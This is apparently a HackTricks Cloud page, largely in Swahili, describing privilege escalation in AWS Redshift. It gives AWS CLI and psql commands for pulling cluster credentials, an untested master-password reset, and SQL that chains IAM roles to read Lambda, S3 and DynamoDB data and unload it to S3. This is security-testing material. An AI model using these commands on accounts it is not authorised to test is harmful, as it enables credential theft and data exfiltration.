AWS - Redshift Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

Redshift

Kwa maelezo zaidi kuhusu RDS angalia:

AWS - Redshift Enum

`redshift:DescribeClusters`, `redshift:GetClusterCredentials`

Kwa ruhusa hizi unaweza kupata habari za makundi yote (ikiwemo jina na jina la mtumiaji wa kundi) na kupata akreditif za kuweza kufikia:

# Get creds
aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:<username>" -d template1 -p 5439

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

`redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`

Kwa ruhusa hizi unaweza kupata taarifa za makundi yote na kupata akreditivu za kuweza kuyafikia. Kumbuka kwamba mtumiaji wa postgres atakuwa na ruhusa ambazo utambulisho wa IAM ulitumika kupata akreditivu hizo unazo.

# Get creds
aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
# Connect, even if the password is a base64 string, that is the password
psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

`redshift:DescribeClusters`, `redshift:ModifyCluster?`

Inawezekana kubadilisha nenosiri la mkuu la mtumiaji wa ndani wa postgres (redshit) kutoka aws cli (nadhani hizo ndizo ruhusa unazohitaji lakini sijazijaribu bado):

aws redshift modify-cluster –cluster-identifier <identifier-for-the cluster> –master-user-password ‘master-password’;

Madhara Yanayoweza Kutokea: Pata taarifa nyeti ndani ya hifadhidata.

Kufikia Huduma za Nje

Ili kufikia rasilimali zote zifuatazo, utahitaji kueleza jukumu la kutumia. Klasta ya Redshift inaweza kuwa na orodha ya majukumu ya AWS ambayo unaweza kutumia ikiwa unajua ARN au unaweza tu kuweka "default" kutumia ile ya default iliyotolewa.

Zaidi ya hayo, kama ilivyoelezwa hapa, Redshift pia inaruhusu kuunganisha majukumu (mradi tu ya kwanza inaweza kuchukua ya pili) ili kupata ufikiaji zaidi lakini tu kwa kuwatenga kwa koma: iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';

Lambdas

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html, inawezekana kuita kazi ya lambda kutoka redshift kwa kitu kama:

CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
RETURNS INT
STABLE
LAMBDA 'lambda_function'
IAM_ROLE default;

S3

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html, inawezekana kusoma na kuandika kwenye S3 buckets:

# Read
copy table from 's3://<your-bucket-name>/load/key_prefix'
credentials 'aws_iam_role=arn:aws:iam::<aws-account-id>:role/<role-name>'
region '<region>'
options;

# Write
unload ('select * from venue')
to 's3://mybucket/tickit/unload/venue_'
iam_role default;

Dynamo

Kama ilivyoelezwa katika https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html, inawezekana kupata data kutoka dynamodb:

copy favoritemovies
from 'dynamodb://ProductCatalog'
iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';

Meza ya Amazon DynamoDB inayotoa data lazima iundwe katika Mkoa mmoja wa AWS kama klasta yako isipokuwa utumie chaguo la REGION kubaini Mkoa wa AWS ambapo meza ya Amazon DynamoDB iko.

EMR

Angalia https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html

References

https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a

Support HackTricks

Angalia mpango wa usajili!
Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

PreviousAWS - RDS Privesc NextAWS - Route53 Privesc

Last updated 3 days ago

Redshift

redshift:DescribeClusters, redshift:GetClusterCredentials

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

redshift:DescribeClusters, redshift:ModifyCluster?

Kufikia Huduma za Nje

Lambdas

S3

Dynamo

EMR

References

Redshift

redshift:DescribeClusters, redshift:GetClusterCredentials

redshift:DescribeClusters, redshift:GetClusterCredentialsWithIAM

redshift:DescribeClusters, redshift:ModifyCluster?

Kufikia Huduma za Nje

Lambdas

S3

Dynamo

EMR

References

`redshift:DescribeClusters`, `redshift:GetClusterCredentials`

`redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`

`redshift:DescribeClusters`, `redshift:ModifyCluster?`

`redshift:DescribeClusters`, `redshift:GetClusterCredentials`

`redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`

`redshift:DescribeClusters`, `redshift:ModifyCluster?`